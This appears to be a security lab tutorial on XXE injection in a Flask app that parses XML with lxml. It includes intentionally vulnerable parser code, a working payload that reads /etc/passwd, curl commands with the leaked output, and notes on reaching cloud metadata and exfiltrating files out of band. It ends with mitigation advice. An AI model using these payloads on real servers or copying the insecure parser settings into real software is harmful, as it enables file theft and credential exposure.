PyFu

XML External Entity (XXE) Injection in Flask Application

Python-based Web Application Attacks

In this section, we will explore how a simple Flask application can become vulnerable to XML External Entity (XXE) attacks when improperly handling XML input using the lxml parser.

Check Python LXML Insecure XML Parsing to know more about the vulnerable lxml code patterns.

To explore the discovery of XXE in Flask application, we have the following application which simulates a configuration upload feature where users can upload XML-based configuration files for cloud providers.

However, due to unsafe parser options, the application allows parsing of external entities, which attackers can exploit to access internal files or sensitive data.

from flask import Flask, request, jsonify
from lxml import etree

app = Flask(__name__)

@app.route('/upload_config', methods=['POST'])
def upload_config():
    xml_data = request.data

    parser = etree.XMLParser(load_dtd=True, resolve_entities=True)
    try:
        root = etree.fromstring(xml_data, parser)

        cloud_name = root.findtext('cloud')
        access_key = root.findtext('access_key')
        secret_key = root.findtext('secret_key')
        ecs_cluster_arn = root.findtext('ecs_cluster_arn')
        ecs_cluster_role = root.findtext('ecs_cluster_role')
        region = root.findtext('region')

        return jsonify({
            'cloud': cloud_name,
            'access_key': access_key,
            'secret_key': secret_key,
            'ecs_cluster_arn': ecs_cluster_arn,
            'ecs_cluster_role': ecs_cluster_role,
            'region': region
        })

    except etree.XMLSyntaxError as e:
        return jsonify({'error': str(e)}), 400

We can see that in this application, the user submits an XML file containing AWS credentials and ECS cluster details.

Flask receives the incoming HTTP request and the raw request body is accessed using request.data, which contains the full binary payload of the request.

Since the client sends the XML content directly in the body, Flask stores it as-is without any automatic parsing or decoding. The application then assigns this raw XML payload to xml_data for further processing:

xml_data = request.data

Then, The application initializes an XML parser using lxml.etree with the options load_dtd=True and resolve_entities=True, explicitly enabling external entity resolution:

parser = etree.XMLParser(load_dtd=True, resolve_entities=True)

Once the parser is configured, the application uses the fromstring function to parse the incoming XML data using this parser:

root = etree.fromstring(xml_data, parser)

These two options will leave the parser vulnerable to XXE attacks and allow the user to parse a malicious XML files that may try to read sensitive data.

To exploit this issue, we will craft a malicious XML payload that defines an external entity referencing the local file /etc/passwd.

This entity is then injected into one of the XML elements, for example, inside the <secret_key> field.

The payload structure looks like:

<?xml version="1.0"?>
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<config>
    <cloud>AWS</cloud>
    <access_key>AKIA123456</access_key>
    <secret_key>&xxe;</secret_key>
    <ecs_cluster_arn>arn:aws:ecs:us-west-1:1234567890:cluster/MyCluster</ecs_cluster_arn>
    <ecs_cluster_role>arn:aws:iam::1234567890:role/ecsServiceRole</ecs_cluster_role>
    <region>us-west-1</region>
</config>

Once this payload is submitted to the vulnerable /upload_config endpoint, the parser processes the entity and replaces &xxe; with the actual file content from /etc/passwd.

As a result, the HTTP response will return the leaked file content inside the secret_key field of the JSON response.

We can use the following curl command to send payload.xml to the vulnerable endpoint:

 curl -X POST http://127.0.0.1:5000/upload_config --data-binary @payload.xml -H "Content-Type: application/xml"

This will return the following response which shows that we successfully read the content of /etc/passwd:

:: PyFu/flask-fu/flask-xxe » curl -X POST http://127.0.0.1:5000/upload_config --data-binary @payload.xml -H "Content-Type: application/xml"

{
  "access_key": "AKIA123456",
  "cloud": "AWS",
  "ecs_cluster_arn": "arn:aws:ecs:us-west-1:1234567890:cluster/MyCluster",
  "ecs_cluster_role": "arn:aws:iam::1234567890:role/ecsServiceRole",
  "region": "us-west-1",
  "secret_key": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man
  ...

By default, lxml does not process external entities unless these options are explicitly enabled

Without manually setting these flags, entity resolution remains disabled to prevent such unsafe behaviour.

Why XXE matters from an offensive security perspective

XXE is the finding I reach for whenever an endpoint parses attacker-supplied XML, because a single external entity turns a config-upload or document-import feature into arbitrary file read. On this lab it leaks /etc/passwd into the response, but in practice I am after application source, framework config, cloud credential files, and SSH keys, all by pointing an entity at a file:// path. XXE is rarely just file read either: it is a server-side request forge in disguise. A SYSTEM "http://169.254.169.254/..." entity reaches cloud metadata and internal services, and parameter or blind out-of-band entities exfiltrate files I cannot see in the response. Python makes this common because lxml is the default XML library and developers flip resolve_entities and load_dtd on without understanding the blast radius.

These are the tells I look for in an assessment:

  • etree.XMLParser(load_dtd=True, resolve_entities=True) or no_network=False. These flags re-enable the dangerous behaviour lxml disables by default; I grep for them first.
  • Any endpoint consuming request.data as XML. Config uploads, SAML, SOAP, RSS/Atom ingestion, SVG and DOCX/XLSX processing, and sitemap parsers are all XML sinks.
  • Reflected parsed fields. When the app echoes parsed values back, &xxe; in a returned element gives me direct file read; when it does not, I go blind with out-of-band entities.
  • Custom parser construction. Hand-rolled XMLParser(...) is the smell; safe defaults usually mean someone deliberately turned them off.

The defender takeaway: keep DTD processing and entity resolution disabled (the lxml default), parse untrusted XML with defusedxml, and reject DOCTYPE where the format does not need it.

Proof of exploitation

Run the lab app (PyFuLabs/flask-fu/flask-xxe) and POST an XML document whose external entity points at /etc/passwd (the malicious payload.xml ships with the lab):

curl -s -X POST "http://pyfu.local/flask-fu/flask-xxe/upload_config" \
  --data-binary @payload.xml -H "Content-Type: application/xml"
{
  "access_key": "AKIA123456",
  "cloud": "AWS",
  "secret_key": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n..."
}

The parser resolved &xxe; and inlined the file’s contents into the secret_key field of the response.

Mitigation

The fix is to disable DTD processing and external-entity resolution, which is lxml’s default; the vulnerability here comes from explicitly constructing XMLParser(load_dtd=True, resolve_entities=True, no_network=False), so those flags must never be set for attacker-supplied XML. Parse untrusted documents with defusedxml for defense in depth, reject DOCTYPE declarations outright where the format does not need them, and validate the result against a schema rather than trusting whatever entities the document declares.